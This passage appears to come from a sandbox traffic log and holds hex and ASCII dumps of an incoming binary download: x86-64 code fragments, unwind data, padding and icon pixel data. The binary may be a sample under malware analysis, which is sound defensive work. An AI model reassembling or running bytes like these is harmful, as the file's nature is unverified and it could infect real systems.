fd 29 ab 45 a6 12 47 f1 fc 48 0e ff 4c 83 d4 Data Ascii: g8/X\|Ii `//lzJn///c///fP8#)~_1"'sOo5.L6.8#KKsqYw@r'o?f0{7]bQ>]<W(ayq'"^D0C#{=L 4#xT_gcQ4O^+I&0)EGHL
2023-10-03 20:34:59 UTC	2353	IN	Data Raw: 04 85 d2 75 05 e8 ae 07 00 00 b8 01 00 00 00 48 83 c4 28 c3 cc cc cc cc 55 41 57 41 56 41 55 41 54 56 57 53 48 83 ec 18 48 8d 6c 24 10 80 3d f4 35 00 00 00 0f 85 5d 01 00 00 c6 05 e7 35 00 00 01 48 83 ec 20 e8 be 0a 00 00 48 83 c4 20 48 98 48 8d 04 80 48 8d 04 c5 0f 00 00 00 48 83 e0 f0 e8 d7 0c 00 00 48 29 c4 48 89 e0 48 89 05 be 35 00 00 c7 05 bc 35 00 00 00 00 00 00 4c 8b 25 95 23 00 00 4c 89 e0 48 2b 05 93 23 00 00 48 83 f8 07 0f 8e 00 01 00 00 48 8b 1d 82 23 00 00 4c 89 e0 48 29 d8 48 83 f8 0c 7c 2c 48 8b 1d 6f 23 00 00 83 3b 00 75 20 48 8b 1d 63 23 00 00 83 7b 04 00 75 13 48 8b 05 56 23 00 00 48 8d 58 0c 83 78 08 00 48 0f 45 d8 83 3b 00 75 0a 83 7b 04 00 0f 84 c3 00 00 00 48 3b 1d 2c 23 00 00 73 47 48 8b 3d 33 23 00 00 48 8d 75 fc 66 2e 0f 1f 84 00 Data Ascii: uH(UAWAVAUATVWSHHl$=5]5H H HHHHH)HH55L%#LH+#HH#LH)H\|,Ho#;u Hc#{uHV#HXxHE;u{H;,#sGH=3#Huf.
2023-10-03 20:34:59 UTC	2369	IN	Data Raw: 02 e0 00 00 01 06 03 00 06 42 02 70 01 60 00 00 01 09 05 00 09 42 05 30 04 70 03 60 02 e0 00 00 01 08 05 00 08 42 04 30 03 50 02 70 01 60 00 00 01 01 01 00 01 60 00 00 01 05 02 00 05 32 01 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Bp`B0p`B0Pp``2`
2023-10-03 20:34:59 UTC	2385	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-10-03 20:34:59 UTC	2401	IN	Data Raw: ae 34 b2 79 9b 87 4e 3d 64 73 d3 a9 c6 8b ea c6 ec 16 f4 85 09 01 4c 3e e2 eb e8 7f 14 bd d8 22 6a b3 09 2b 5b 39 2e 92 4a 3c a4 31 2e 7c bd 6a 00 46 12 71 2a bc 0c 1b 0a 68 4d 7c 34 5e 70 b2 92 0f cd 99 39 03 4b 65 4b d9 1a 64 3b b9 51 6e 06 a3 d1 69 ba d3 18 08 f1 a8 e6 57 b5 2d 94 ce df 25 a8 4b 13 c8 5b a6 76 8f 5a 46 30 06 39 9d 76 3a fc c4 78 32 b3 cf 7b 56 69 e3 dc c6 9f cc 3f e1 cc dd 79 77 77 c3 e1 26 5f 8c f9 72 10 9c db b5 2a 70 75 12 98 96 24 de 4c 4c 02 91 2e 1e 88 db 80 8f 28 2c 0a a3 e5 0c 68 3c 4f d2 90 08 04 0e 04 11 81 e9 56 1f b1 41 e6 97 15 db d5 95 35 c5 2b a2 c6 f1 d7 c4 af 8c a1 1e c6 51 3f 47 fa 86 57 7b fe c9 81 d9 6e 00 cc a8 12 3c 34 78 28 82 68 93 de 32 0c a9 be 26 c3 79 a8 ff d4 72 54 99 a3 cc 98 de 98 22 a2 28 3b df 29 8e 3f Data Ascii: 4yN=dsL>"j+[9.J<1.\|jFqhM\|4^p9KeKd;QniW-%K[vZF09v:x2{Vi?yww&_rpu$LL.(,h<OVA5+Q?GW{n<4x(h2&yrT"(;)?
2023-10-03 20:34:59 UTC	2417	IN	Data Raw: 0f 4c ca 9f 54 c2 d4 a2 a5 1d da 53 36 b5 6d ca 41 ee d1 b5 9c 6a ce 02 cb 47 0e f5 1c 0a 81 1c a0 06 ab 61 a6 96 2e 5d 91 f2 be 0c 94 09 32 1a b2 e6 2f 3e ad b8 0e b2 e6 2c 5e ba f8 c3 34 3a fb eb 2e 79 0d 56 58 41 5c d9 90 7a 21 3f c0 1f fd a6 5c 9d 6a 0d 97 cf ae 38 bb f2 14 e8 77 26 ac 48 58 0f 96 ed ed 6d ec 13 a0 f2 a1 fe 9d fa fd 0e a5 4f 74 b1 ff ba 31 28 ad b5 83 b5 bd 79 b5 13 16 19 ab 03 64 d4 77 8f 8b 3d ee 0e be 0d f7 6c da 9b 0d d4 be 3a 47 9d 0b 50 51 f4 16 bd 4d 2d 9d 99 74 87 1f 3e dc d6 9f 54 78 41 56 bc e4 53 53 cb 63 e6 03 51 89 3e f4 86 88 e5 f7 27 3f 08 07 5d 54 7c d3 84 ee a6 16 2a ed c9 7d b4 c6 8d ea d5 c0 63 52 09 7d 89 99 40 53 b9 56 6e c0 9c 24 f5 d7 a4 b8 ca 6f c9 df e4 6f 60 e9 60 f7 ab dd 42 28 92 d8 ea fb 96 eb c1 e2 8e dd Data Ascii: LTS6mAjGa.]2/>,^4:.yVXA\z!?\j8w&HXmOt1(ydw=l:GPQM-t>TxAVSScQ>'?]T\|*}cR}@SVn$oo``B(
2023-10-03 20:34:59 UTC	2433	IN	Data Raw: bc 87 df 40 bf 0d 10 d1 f7 41 a3 07 93 21 f6 68 70 ce e0 c3 10 5f 20 6c 45 f8 50 88 ef 1c 1e 1f 7e 19 92 be 8b 59 10 f3 05 70 40 2e 90 47 81 d9 62 b0 18 04 94 61 10 5f 83 f8 5c 7c 2b 96 00 9d 89 a5 29 a0 15 85 c5 6a b0 fe 26 d3 10 e7 c9 a0 e4 d4 36 d1 86 9b fa 4b 49 3b c2 36 de 8b b9 d7 18 12 13 a2 ad a2 8f 02 5a 8e 72 18 f8 99 c2 14 f8 af 67 37 f3 8f b1 c4 1e 3b 90 cd d5 4d ea 6e 08 9b ea 3b c9 77 1d 48 c5 d0 d4 f0 1c c4 cf 1a 6f 4d 7a 8e 99 77 e7 28 c7 c1 e6 82 cb 52 97 42 20 c6 88 68 11 07 72 a4 d9 de fc 08 d1 a2 60 85 6a c8 4e 3c 39 71 da 6a 88 ce 17 92 4b e9 fc f8 2b 87 7b ae 27 65 59 66 ea 9e 18 fc b5 27 01 17 a0 64 5a 5e 38 8d 09 ac 7f 7e f4 09 2b d4 4c e3 b3 8c ce 7a 91 9f 64 75 71 9c 0d 5b 57 93 19 85 21 5f f5 27 18 49 7c de 99 46 c5 93 ea 4c 36 Data Ascii: @A!hp_ lEP~Yp@.Gba_\\|+)j&6KI;6Zrg7;Mn;wHoMzw(RB hr`jN<9qjK+{'eYf'dZ^8~+Lzduq[W!_'I\|FL6
2023-10-03 20:34:59 UTC	2449	IN	Data Raw: 00 1b 18 8b 00 1b 18 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2023-10-03 20:34:59 UTC	2465	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 18 87 00 19 18 87 00 1a 16 87 00 19 17 87 31 19 17 87 c4 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii: 1
2023-10-03 20:34:59 UTC	2481	IN	Data Raw: ff 19 17 87 ff 19 17 87 ff 16 14 85 ff 63 62 ad ff f7 f7 fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d7 d7 ea ff 31 2f 94 ff 17 15 86 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 15 13 85 ff 8f 8e Data Ascii: cb1/
2023-10-03 20:34:59 UTC	2497	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 9b 9a cb ff 1e 1c 89 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii:
2023-10-03 20:34:59 UTC	2513	IN	Data Raw: ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 b8 19 17 87 e0 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 1a 18 87 ff 99 98 ca ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2023-10-03 20:34:59 UTC	2529	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff a4 a4 d0 ff 1e 1c 8a ff 18 16 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 17 15 86 ff 7a 79 ba ff fb fb fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fb fb fd ff 71 70 b5 ff 13 11 84 ff 45 43 Data Ascii: zyqpEC
2023-10-03 20:34:59 UTC	2545	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fe ff 7e 7d bc ff 18 16 86 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii: ~}
2023-10-03 20:34:59 UTC	2561	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 16 84 00 19 17 87 00 19 17 87 20 19 17 87 cf 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii:
2023-10-03 20:34:59 UTC	2577	IN	Data Raw: ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 17 15 86 ff 18 16 87 ff 3c 3a 99 ff 9e 9d cc ff f4 f4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: <:
2023-10-03 20:34:59 UTC	2593	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ff ff ff ff ff fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f ff ff ff ff f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3f ff ff ff ff f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1f ff ff ff ff e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f ff ff ff ff c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 ff ff ff ff 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 Data Ascii: ?
2023-10-03 20:34:59 UTC	2609	IN	Data Raw: ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 aa 19 17 88 0d 19 17 87 00 18 17 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 17 87 00 19 17 87 00 19 17 87 2a 19 17 87 d8 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 17 15 86 ff 8e 8d c4 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: *
2023-10-03 20:34:59 UTC	2625	IN	Data Raw: ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ba 19 17 87 de 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 1a 18 88 ff 9d 9c cc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2023-10-03 20:34:59 UTC	2641	IN	Data Raw: ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 9b 1b 18 87 02 1a 18 87 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 17 87 00 18 17 87 00 19 17 87 74 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 17 15 86 ff 1c 1a 88 ff 51 50 a4 ff af ae d5 ff ef ef f7 ff ff ff Data Ascii: tQP
2023-10-03 20:34:59 UTC	2657	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 13 86 00 1b 18 87 00 19 17 87 00 19 17 87 00 19 17 87 21 19 17 87 86 19 17 87 e2 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii: !
2023-10-03 20:34:59 UTC	2673	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff f9 f9 fc ff 6c 6b b2 ff 16 14 85 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 1a 18 88 ff 96 95 c8 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f6 f6 fa ff 56 54 a7 ff 16 14 85 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 f6 19 17 87 4a 19 17 87 00 1a 17 87 00 00 00 00 00 00 00 ff 00 19 17 87 00 19 17 87 1d 19 17 87 d8 19 17 87 ff 19 17 Data Ascii: lkVTJ
2023-10-03 20:34:59 UTC	2689	IN	Data Raw: fd 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 18 16 87 ff 17 15 86 ff 15 13 85 ff 15 13 85 ff 17 15 86 ff 17 15 86 ff 17 15 86 ff 16 14 86 ff 15 13 85 ff 16 14 85 ff 17 15 86 ff 17 15 86 ff 21 1f 8b ff 7f 7e bc ff ed ed f5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff cd cd e5 ff 48 46 9f ff 17 15 86 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii: !~HF
2023-10-03 20:34:59 UTC	2705	IN	Data Raw: ff 19 17 87 ff 19 17 87 bf 19 17 87 0c 19 17 87 00 19 17 87 00 19 17 87 5f 19 17 87 fd 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 18 16 86 ff 5a 58 a9 ff d6 d6 ea ff ff ff ff ff ff ff ff ff ff ff ff ff ba b9 db ff 78 77 b8 ff fc fc fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b9 b9 db ff 42 41 9d ff 19 17 87 ff 16 14 85 ff 19 17 87 ff 19 17 87 ff 16 14 85 ff 1b 19 88 ff 52 51 a5 ff ce cd e5 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff f5 f5 fa ff 57 56 a8 ff 16 14 85 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 Data Ascii: _ZXxwBARQWV
2023-10-03 20:34:59 UTC	2721	IN	Data Raw: ff 1e 1c 8a ff 16 14 86 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 18 16 86 ff 6a 69 b1 ff e7 e7 f3 ff b3 b2 d7 ff 98 97 c9 ff eb ea f4 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c1 c0 df ff 26 24 8e ff 18 16 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 fb 19 17 87 fe 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 16 14 86 ff 43 41 9d ff ee ee f6 ff ff ff ff ff ff ff ff ff ff ff ff ff ec ec f5 ff 43 41 9d ff 16 14 85 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 19 17 87 ff 18 16 87 ff 23 21 8c ff c7 c6 e2 ff ff ff ff ff cc cc e5 ff 91 90 c6 ff ef ef f7 ff ff ff ff ff ff ff ff ff ff ff ff ff f9 f9 Data Ascii: ji&$CACA#!
